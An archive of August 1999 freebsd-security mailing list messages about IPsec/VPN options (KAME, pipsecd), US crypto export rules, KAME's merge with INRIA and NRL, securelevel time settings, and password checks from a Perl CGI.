[127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id UAA04730; Sun, 22 Aug 1999 20:42:46 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) To: Darren Reed Cc: petrilli@amber.org (Christopher Petrilli), freebsd-security@FreeBSD.ORG Subject: Re: VPN for FreeBSD 2.2.8 and 3.2 In-reply-to: Your message of "Mon, 23 Aug 1999 13:36:16 +1000." <199908230336.NAA21519@cheops.anu.edu.au> Date: Sun, 22 Aug 1999 20:42:46 -0700 Message-ID: <4726.935379766@localhost> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Bah, so FreeBSD will be InSecureBSD ? Well, so long as the ITAR bear > stands around making grizzly noises at people, it seems. I wouldn't count on that. As far as I can tell, what's holding KAME integration up is the fact that they're not done merging with INRIA yet. Once that happens, I'm more than happy to continue to lean on Justice Maryln Patel's decision on crypto as free speach in the S.F. Bay Area region. We've already talked to our lawyer, he said it looked legit to him, and so we've been shipping crypto on our CDs for over a year now. I even announced it back then, to almost no audience reaction whatsoever. It seems that people like to get more excited about the prospect of something being closed than it being opened up. :) > FreeBSD appears to be doing better than the other two groups in terms > of resources...there are ways around it although I'm disappointed to > see that FreeBSD isn't interested. FreeBSD is certainly interested. Don't believe everything you hear from the user community. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 20:43:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from trump.amber.org (trump.amber.org [209.31.146.82]) by hub.freebsd.org (Postfix) with ESMTP id B6B5F15410 for ; Sun, 22 Aug 1999 20:43:51 -0700 (PDT) (envelope-from petrilli@amber.org) Received: by trump.amber.org (Postfix, from userid 1000) id 4F59C1862A; Sun, 22 Aug 1999 23:43:51 -0400 (EDT) Message-ID: <19990822234351.D18458@amber.org> Date: Sun, 22 Aug 1999 23:43:51 -0400 From: Christopher Petrilli To: freebsd-security@FreeBSD.ORG Cc: avalon@coombs.anu.edu.au Subject: Re: VPN for FreeBSD 2.2.8 and 3.2 References: <19990822231452.A18458@amber.org> <199908230336.NAA21519@cheops.anu.edu.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <199908230336.NAA21519@cheops.anu.edu.au>; from Darren Reed on Mon, Aug 23, 1999 at 01:36:16PM +1000 X-Disclaimer: I hardly speak for myself, muchless anyone else. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Aug 23, 1999 at 01:36:16PM +1000, Darren Reed wrote: > In some mail from Christopher Petrilli, sie said: > > > > On Mon, Aug 23, 1999 at 01:11:23PM +1000, Darren Reed wrote: > > > In some mail from Nicholas Brawn, sie said: > > > > > > > > Have a look at www.kame.net, and see if it fits your requirements. KAME is > > > > a freely available IPv6 & IPSec stack for BSD (developed in Japan). > > > > > > You mean it's not yet integrated into FreeBSD ?! > > > > No, and never will be so long as ITAR stands, and the FreeBSD group is > > based in the UNited States. This is why OpenBSD has to jump through so > > many hoops to stay legal. > > Bah, so FreeBSD will be InSecureBSD ? Well, so long as the ITAR bear > stands around making grizzly noises at people, it seems. Is this flamebait really necessary? FreeBSD is hardly insecure, and for 99.999999% of the situations, set up by a knowledgable administrator, is every bit as secure as OpenBSD, or anything else. IPsec, while a great idea, has hardly bee na resounding success outside of tightly controlled remoate access VPN solutions at companies. If you've ever tried to set it up, you'd undersand why. Without a complete PKI infrastructure to back it up, it won't ever succeed. Been there, done that. Additionally, many applications are VERY sensitive to latency introduction, especially things like VoIP and video, and in that situation, software solutions aren't accceptable because of their non-deterministic behaviour. > > Unfortunately, the KAME integation isn't for the faint of heart. > > Chris > > FreeBSD appears to be doing better than the other two groups in terms > of resources...there are ways around it although I'm disappointed to > see that FreeBSD isn't interested. I doubt it's a lack of interest, but a lack of someone taking the initiative... someone in a country that could deal with it, and deal with all the other nightmarish issues of distribution since Walnut Creek couldn't do it any more. Chris -- | Christopher Petrilli ``Television is bubble-gum for | petrilli@amber.org the mind.''-Frank Lloyd Wright To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 22:27: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.xmission.com (mail.xmission.com [198.60.22.22]) by hub.freebsd.org (Postfix) with ESMTP id C51DC15585 for ; Sun, 22 Aug 1999 22:26:59 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from [204.68.178.39] (helo=softweyr.com) by mail.xmission.com with esmtp (Exim 2.12 #1) id 11Imcp-0004tj-00; Sun, 22 Aug 1999 23:26:31 -0600 Message-ID: <37C0DB86.838CF89E@softweyr.com> Date: Sun, 22 Aug 1999 23:26:30 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Christopher Petrilli Cc: freebsd-security@FreeBSD.ORG, avalon@coombs.anu.edu.au Subject: Re: VPN for FreeBSD 2.2.8 and 3.2 References: <19990822231452.A18458@amber.org> <199908230336.NAA21519@cheops.anu.edu.au> <19990822234351.D18458@amber.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Christopher Petrilli wrote: > > On Mon, Aug 23, 1999 at 01:36:16PM +1000, Darren Reed wrote: > > > > Bah, so FreeBSD will be InSecureBSD ? Well, so long as the ITAR bear > > stands around making grizzly noises at people, it seems. > > Is this flamebait really necessary? FreeBSD is hardly insecure, and for > 99.999999% of the situations, set up by a knowledgable administrator, is > every bit as secure as OpenBSD, or anything else. Apparently Darren didn't read the blurbs about the Linux Death Match at the recent Chaos Computer Club campout in Germany. It was won by a FreeBSD box with NO offensive effort, only defense. InSecureBSD my ass. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://softweyr.com/ wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 22:39:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id 6A91714DC4 for ; Sun, 22 Aug 1999 22:39:25 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id HAA07175; Mon, 23 Aug 1999 07:38:22 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Ollivier Robert Cc: freebsd-security@FreeBSD.ORG Subject: Re: Securelevel 3 ant setting time In-reply-to: Your message of "Sun, 22 Aug 1999 22:34:15 +0200." <19990822223415.A11240@keltia.freenix.fr> Date: Mon, 23 Aug 1999 07:38:22 +0200 Message-ID: <7173.935386702@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <19990822223415.A11240@keltia.freenix.fr>, Ollivier Robert writes: >According to Poul-Henning Kamp: >> no. > >It is prefectly understandable when taking into account the time we have >before the release but I'd like to see it in 4.0. Or, if we don't want to jump >to ntpd, at least upgrade the ancient version we have... Ohh, yeah, of course it should be done before 4.0 -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 23: 6:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from frmug.org (frmug-gw.frmug.org [193.56.58.252]) by hub.freebsd.org (Postfix) with ESMTP id EF120155DA for ; Sun, 22 Aug 1999 23:06:52 -0700 (PDT) (envelope-from roberto@keltia.freenix.fr) Received: (from uucp@localhost) by frmug.org (8.9.1/frmug-2.3/nospam) with UUCP id IAA26791 for freebsd-security@FreeBSD.ORG; Mon, 23 Aug 1999 08:06:33 +0200 (CEST) (envelope-from roberto@keltia.freenix.fr) Received: by keltia.freenix.fr (Postfix, from userid 101) id 77AD0870A; Mon, 23 Aug 1999 07:48:04 +0200 (CEST) Date: Mon, 23 Aug 1999 07:48:04 +0200 From: Ollivier Robert To: freebsd-security@FreeBSD.ORG Subject: Re: VPN for FreeBSD 2.2.8 and 3.2 Message-ID: <19990823074804.A15716@keltia.freenix.fr> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <1.5.4.32.19990823030416.009fbf08@mymail.com.br> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii User-Agent: Mutt/0.95.5i In-Reply-To: <1.5.4.32.19990823030416.009fbf08@mymail.com.br>; from Fabio da Silva Cunha on Mon, Aug 23, 1999 at 12:04:16AM -0300 X-Operating-System: FreeBSD 4.0-CURRENT/ELF ctm#5543 AMD-K6 MMX @ 200 MHz Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org According to Fabio da Silva Cunha: > What crypto this supports? > > DES / 3DES / BlowFish ? Whatever is supported by OpenSSL. Pipsecd doesn't contain any crypto. It was developped by a FreeBSD committer BTW: Pierre Beyssac. -- Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 4.0-CURRENT #73: Sat Jul 31 15:36:05 CEST 1999 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 23:32:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from nexus.plymovent.se (nexus.plymovent.se [212.247.77.253]) by hub.freebsd.org (Postfix) with ESMTP id 98D2215601 for ; Sun, 22 Aug 1999 23:32:21 -0700 (PDT) (envelope-from thomas.uhrfelt@plymovent.se) Received: from tu ([192.168.1.21]) by nexus.plymovent.se (8.9.3/8.9.3) with SMTP id IAA03594; Mon, 23 Aug 1999 08:39:20 +0200 (CEST) (envelope-from thomas.uhrfelt@plymovent.se) From: "Thomas Uhrfelt" To: "Ollivier Robert" Cc: Subject: RE: VPN for FreeBSD 2.2.8 and 3.2 Date: Mon, 23 Aug 1999 08:30:48 +0200 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 In-Reply-To: <19990823074804.A15716@keltia.freenix.fr> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org And all I can say is that this beutiful constructed piece of software works flawlessly for me. Both KAME and SKIP failed to work due to various reasons ranging from stupid administrator (me!), driver packet corruption, bugs in software etc. not to mention our highly unortodox network topology .. but ipsecd had no problem dealing with our network (which incorporates VPNs between 5 countries and hidden segments) My hat off to Pierre and let us all hope that he will continue to develop and enhance ipsecd. If this had been commited to the ports tree a while back I would have saved myself 2 months of grief with SKIP/KAME. Regards, Thomas Uhrfelt > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Ollivier Robert > Sent: den 23 augusti 1999 07:48 > To: freebsd-security@FreeBSD.ORG > Subject: Re: VPN for FreeBSD 2.2.8 and 3.2 > > > According to Fabio da Silva Cunha: > > What crypto this supports? > > > > DES / 3DES / BlowFish ? > > Whatever is supported by OpenSSL. Pipsecd doesn't contain any > crypto. It was > developped by a FreeBSD committer BTW: Pierre Beyssac. > -- > Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=- > roberto@keltia.freenix.fr > FreeBSD keltia.freenix.fr 4.0-CURRENT #73: Sat Jul 31 15:36:05 CEST 1999 > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 0:35:25 1999 Delivered-To: freebsd-security@freebsd.org Received: from coconut.itojun.org (coconut.itojun.org [210.160.95.97]) by hub.freebsd.org (Postfix) with ESMTP id 561F114CC8 for ; Mon, 23 Aug 1999 00:35:20 -0700 (PDT) (envelope-from itojun@itojun.org) Received: from kiwi.itojun.org (localhost.itojun.org [127.0.0.1]) by coconut.itojun.org (8.9.3+3.2W/3.7W) with ESMTP id QAA29270; Mon, 23 Aug 1999 16:34:36 +0900 (JST) To: "Thomas Uhrfelt" Cc: "Ollivier Robert" , freebsd-security@FreeBSD.ORG In-reply-to: thomas.uhrfelt's message of Mon, 23 Aug 1999 08:30:48 +0200. X-Template-Reply-To: itojun@itojun.org X-Template-Return-Receipt-To: itojun@itojun.org X-PGP-Fingerprint: F8 24 B4 2C 8C 98 57 FD 90 5F B4 60 79 54 16 E2 Subject: Re: VPN for FreeBSD 2.2.8 and 3.2 From: itojun@iijlab.net Date: Mon, 23 Aug 1999 16:34:36 +0900 Message-ID: <29268.935393676@coconut.itojun.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >And all I can say is that this beutiful constructed piece of software works >flawlessly for me. Both KAME and SKIP failed to work due to various reasons >ranging from stupid administrator (me!), driver packet corruption, bugs in >software etc. not to mention our highly unortodox network topology .. but >ipsecd had no problem dealing with our network (which incorporates VPNs >between 5 countries and hidden segments) Could you send us more detail about you rtroubles with KAME? I love to fix those especially it is due to KAME bugs. itojun@kame To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 0:53:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from coconut.itojun.org (coconut.itojun.org [210.160.95.97]) by hub.freebsd.org (Postfix) with ESMTP id 4210915764 for ; Mon, 23 Aug 1999 00:53:23 -0700 (PDT) (envelope-from itojun@itojun.org) Received: from kiwi.itojun.org (localhost.itojun.org [127.0.0.1]) by coconut.itojun.org (8.9.3+3.2W/3.7W) with ESMTP id QAA29580; Mon, 23 Aug 1999 16:53:09 +0900 (JST) To: "Jordan K. Hubbard" Cc: freebsd-security@FreeBSD.ORG In-reply-to: jkh's message of Sun, 22 Aug 1999 20:42:46 MST. <4726.935379766@localhost> X-Template-Reply-To: itojun@itojun.org X-Template-Return-Receipt-To: itojun@itojun.org X-PGP-Fingerprint: F8 24 B4 2C 8C 98 57 FD 90 5F B4 60 79 54 16 E2 Subject: IPsec/IPv6 From: itojun@iijlab.net Date: Mon, 23 Aug 1999 16:53:09 +0900 Message-ID: <29578.935394789@coconut.itojun.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >> Bah, so FreeBSD will be InSecureBSD ? Well, so long as the ITAR bear >> stands around making grizzly noises at people, it seems. >I wouldn't count on that. As far as I can tell, what's holding KAME >integration up is the fact that they're not done merging with INRIA >yet. A news about NRL/INRIA/KAME merging (unified-ipv6). unified-ipv6 project has been in big trouble with manpower, design differences. Recently situations changed for all of us so here's the decision we have made. NRL decided to concentrates on IPsec (because in US not much interest in IPv6 than IPsec - people in US are lucky about IPv4 address space, it seems). INRIA will be doing future researches on top of KAME code. KAME agreed to add some knobs that helps INRIA to do their experiment. So, it is planned that KAME will have an alias: "unified-ipv6". KAME team is trying to ship KAME/OpenBSD and KAME/BSDI4 during this month or next month (September). KAME September 30th STABLE kit will officially have "unified-ipv6" alias on it. It is now okay to merge KAME code into FreeBSD, I believe. If you do not feel ready, I'll be visiting FreeBSDCon so let's talk about it there (but will cause 2 month delay from now). The biggest problem is how to keep mutiple repositories in sync. KAME (= unified-ipv6) code shares most of IPv6 code among *BSD platforms. If FreeBSD repository is modified after import, and that conflicts with content in KAME repository, we can't merge that back in. So I would like to suggest FreeBSD project to refrain from changing IPv6 part too much, for certain amount of time (*). Rather, please send diffs to KAME. >Once that happens, I'm more than happy to continue to lean on >Justice Maryln Patel's decision on crypto as free speach in the S.F. >Bay Area region. We've already talked to our lawyer, he said it >looked legit to him, and so we've been shipping crypto on our CDs for >over a year now. I even announced it back then, to almost no audience >reaction whatsoever. It seems that people like to get more excited >about the prospect of something being closed than it being opened >up. :) It now happened, so please contact Mr. Patel:-) KAME team really needs your suggestions on how to integrate crypto part. In case of NetBSD/KAME integration, we did like this: - place IPsec core part and AH part into cvs.netbsd.org (in US) - place ESP part and crypto algorithms (DES, Blowfish and whatever in cvs.fi.netbsd.org (in finland) We need some tricky symbolic link, or makefile/config hack for this separated repository (NetBSD has makefile and config hack). itojun (*) As a side note: actually, KAME and unified-ipv6 has been experiencing big trouble sharing IPv6 code among *BSD, due to FreeBSD's variable renaming like ifa_list (ifa_link on others) or time_second (why FreeBSD couldn't reuse time.tv_sec to hold this? I don't get it). I'd like propose to fix those back to more standard ones (ifa_link or time.tv_sec) for portability among *BSD. If you are okay, those changes will come with FreeBSD/KAME integration. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 4:47:48 1999 Delivered-To: freebsd-security@freebsd.org Received: from www.inx.de (www.inx.de [195.21.255.251]) by hub.freebsd.org (Postfix) with ESMTP id 2734314CEE for ; Mon, 23 Aug 1999 04:47:45 -0700 (PDT) (envelope-from jnickelsen@acm.org) Received: from n243-78.berlin.snafu.de ([195.21.243.78] helo=goting.jn.berlin.snafu.de) by www.inx.de with esmtp (Exim 3.02 #1) id 11IsXO-0007Hk-00; Mon, 23 Aug 1999 13:45:18 +0200 Received: by goting.jn.berlin.snafu.de (Postfix, from userid 100) id D5CDC2F9; Mon, 23 Aug 1999 12:13:10 +0200 (CEST) To: "Jordan K. Hubbard" Cc: freebsd-security@FreeBSD.ORG Subject: Re: VPN for FreeBSD 2.2.8 and 3.2 References: <4726.935379766@localhost> From: Juergen Nickelsen Date: 23 Aug 1999 12:13:10 +0200 In-Reply-To: "Jordan K. Hubbard"'s message of "Sun, 22 Aug 1999 20:42:46 -0700" Message-ID: Lines: 19 X-Mailer: Gnus v5.5/XEmacs 20.4 - "Emerald" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Jordan K. Hubbard" writes on freebsd-security: > [...] we've been shipping crypto on our CDs for over a year now. I > even announced it back then, to almost no audience reaction > whatsoever. It seems that people like to get more excited about > the prospect of something being closed than it being opened up. :) Jordan, I *am* excited that you are shipping a really complete system, and I have been from the day I heard it. Not that we outside the US (as in Germany, where I live) wouldn't be able to get equivalent crypto solutions otherwise, but the US's crypto export regulations are such a stupid nuisance. For this reason I am always excited when it gets closer to shut them down. Greetings, -- Juergen Nickelsen To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 5:26: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.sminter.com.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 7F88F156A0 for ; Mon, 23 Aug 1999 05:25:53 -0700 (PDT) (envelope-from fpscha@ns1.sminter.com.ar) Received: (from fpscha@localhost) by ns1.sminter.com.ar (8.8.5/8.8.4) id JAA05046; Mon, 23 Aug 1999 09:26:28 -0300 (GMT) Message-Id: <199908231226.JAA05046@ns1.sminter.com.ar> Subject: Re: getting passwored data via a perl cgi In-Reply-To: from Colin Eric Johnson at "Aug 22, 99 09:57:31 am" To: colinj@cs.unm.edu (Colin Eric Johnson) Date: Mon, 23 Aug 1999 09:26:28 -0300 (GMT) Cc: freebsd-security@FreeBSD.ORG From: Fernando Schapachnik X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org En un mensaje anterior, Colin Eric Johnson escribió: > > I'm in the process of writing a cgi script in perl that should verify > people against the machines password file. The problem that I am running > into is that if the script is run by anyone other then root I get an > empty encrypted password field. > > I don't want to run the cgi SUID root as this doesn't seem safe. > > Is there a way to allow other users access to complete password database? > I understand, basically, why this is restricted but I'm not sure how else > to solve this given FreeBSDs restrictions. For a similar problem I decided to use the SuExec feature of Apache. Basically you create a wrapper that talks to a suid program exchanging minimun (and because of this, easily veryfied) information. SuExec performs a *lot* of security checks. You can read more about SuExec in the Apache documentation. Good luck! Fernando P. Schapachnik Administración de la red VIA Net Works Argentina SA Diagonal Roque Sáenz Peña 971, 4º y 5º piso. 1035 - Capital Federal, Argentina. (54-11) 4323-3333 http://www.via-net-works.net.ar To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 11:26: 9 1999 Delivered-To: freebsd-security@freebsd.org Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id 5F9B11573A; Mon, 23 Aug 1999 11:25:51 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id LAA13770; Mon, 23 Aug 1999 11:23:03 -0700 (PDT) Received: from utah.XYLAN.COM by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id LAA17703; Mon, 23 Aug 1999 11:15:53 -0700 Received: from softweyr.com by utah.XYLAN.COM (SMI-8.6/SMI-SVR4 (xylan utah [SPOOL])) id MAA26693; Mon, 23 Aug 1999 12:22:57 -0600 Message-ID: <37C19181.9046615A@softweyr.com> Date: Mon, 23 Aug 1999 12:22:57 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: E Kovarski , Alex Nash , freebsd-security@freebsd.org, advocacy@freebsd.org Subject: Re: VPN for FreeBSD 2.2.8 and 3.2 References: <19990822231452.A18458@amber.org> <199908230336.NAA21519@cheops.anu.edu.au> <19990822234351.D18458@amber.org> <37C0DB86.838CF89E@softweyr.com> <87k8qnauj4.fsf@nyctereutes.digitalized.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org E Kovarski wrote: > Wes Peters writes: > > Christopher Petrilli wrote: > > > > > > On Mon, Aug 23, 1999 at 01:36:16PM +1000, Darren Reed wrote: > > > > > > > > Bah, so FreeBSD will be InSecureBSD ? Well, so long as the ITAR bear > > > > stands around making grizzly noises at people, it seems. > > > > > > Is this flamebait really necessary? FreeBSD is hardly insecure, and for > > > 99.999999% of the situations, set up by a knowledgable administrator, is > > > every bit as secure as OpenBSD, or anything else. > > > > Apparently Darren didn't read the blurbs about the Linux Death Match > > at the recent Chaos Computer Club campout in Germany. It was won by > > a FreeBSD box with NO offensive effort, only defense. > > > > InSecureBSD my ass. > > Would you happen to have a link to the mentioned "Linux Death Match?" Several others have asked for this as well, so here's the first mention of it: http://www.computerworld.com/home/news.nsf/all/9908102chaos The Chaos Computer Club has a page of links to mentions of their Camp in the press at: https://www.ccc.de/camp/pressreviews.html For your reading enjoyment. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://softweyr.com/ wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 11:32:12 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 8845414F5A for ; Mon, 23 Aug 1999 11:31:53 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id MAA70229; Mon, 23 Aug 1999 12:30:36 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id MAA40570; Mon, 23 Aug 1999 12:31:16 -0600 (MDT) Message-Id: <199908231831.MAA40570@harmony.village.org> To: Greg Black Subject: Re: Securelevel 3 ant setting time Cc: freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Sun, 22 Aug 1999 18:09:09 +1000." <19990822080909.6389.qmail@alice.gba.oz.au> References: <19990822080909.6389.qmail@alice.gba.oz.au> <6639.935186801@critter.freebsd.dk> Date: Mon, 23 Aug 1999 12:31:16 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <19990822080909.6389.qmail@alice.gba.oz.au> Greg Black writes: : entirely useful. Will version 4 be part of the 3.3 release? Nope. Version 4 is still, IIRC, in beta. A Version 4 port may be included, however. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 11:35:44 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 561D814F3E for ; Mon, 23 Aug 1999 11:35:29 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id MAA70254 for ; Mon, 23 Aug 1999 12:35:06 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id MAA40614 for ; Mon, 23 Aug 1999 12:35:47 -0600 (MDT) Message-Id: <199908231835.MAA40614@harmony.village.org> Subject: Re: VPN for FreeBSD 2.2.8 and 3.2 To: freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Sun, 22 Aug 1999 20:42:46 PDT." <4726.935379766@localhost> References: <4726.935379766@localhost> Date: Mon, 23 Aug 1999 12:35:47 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org : > Bah, so FreeBSD will be InSecureBSD ? Well, so long as the ITAR bear : > stands around making grizzly noises at people, it seems. InSecureBSD? I don't think so. FreeBSD takes security very seriously... I think that since we're based in the bay area that export of crypto is completely legal. Warner FreeBSD Security Officer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 11:39: 9 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 3790F14E9D for ; Mon, 23 Aug 1999 11:39:06 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id MAA70271; Mon, 23 Aug 1999 12:36:55 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id MAA40646; Mon, 23 Aug 1999 12:37:35 -0600 (MDT) Message-Id: <199908231837.MAA40646@harmony.village.org> To: Christopher Petrilli Subject: Re: VPN for FreeBSD 2.2.8 and 3.2 Cc: freebsd-security@FreeBSD.ORG, avalon@coombs.anu.edu.au In-reply-to: Your message of "Sun, 22 Aug 1999 23:43:51 EDT." <19990822234351.D18458@amber.org> References: <19990822234351.D18458@amber.org> <19990822231452.A18458@amber.org> <199908230336.NAA21519@cheops.anu.edu.au> Date: Mon, 23 Aug 1999 12:37:35 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <19990822234351.D18458@amber.org> Christopher Petrilli writes: : Is this flamebait really necessary? FreeBSD is hardly insecure, and for : 99.999999% of the situations, set up by a knowledgable administrator, is : every bit as secure as OpenBSD, or anything else. In the extreme edge cases, as well as for bundled crypto OpenBSD has a slight edge here. FreeBSD is certainly secure enough for most people's needs, and getting more so all the time. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 11:39:36 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 201BA14D15 for ; Mon, 23 Aug 1999 11:39:25 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id MAA70275; Mon, 23 Aug 1999 12:37:36 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id MAA40659; Mon, 23 Aug 1999 12:38:16 -0600 (MDT) Message-Id: <199908231838.MAA40659@harmony.village.org> To: Wes Peters Subject: Re: VPN for FreeBSD 2.2.8 and 3.2 Cc: Christopher Petrilli , freebsd-security@FreeBSD.ORG, avalon@coombs.anu.edu.au In-reply-to: Your message of "Sun, 22 Aug 1999 23:26:30 MDT." <37C0DB86.838CF89E@softweyr.com> References: <37C0DB86.838CF89E@softweyr.com> <19990822231452.A18458@amber.org> <199908230336.NAA21519@cheops.anu.edu.au> <19990822234351.D18458@amber.org> Date: Mon, 23 Aug 1999 12:38:16 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: 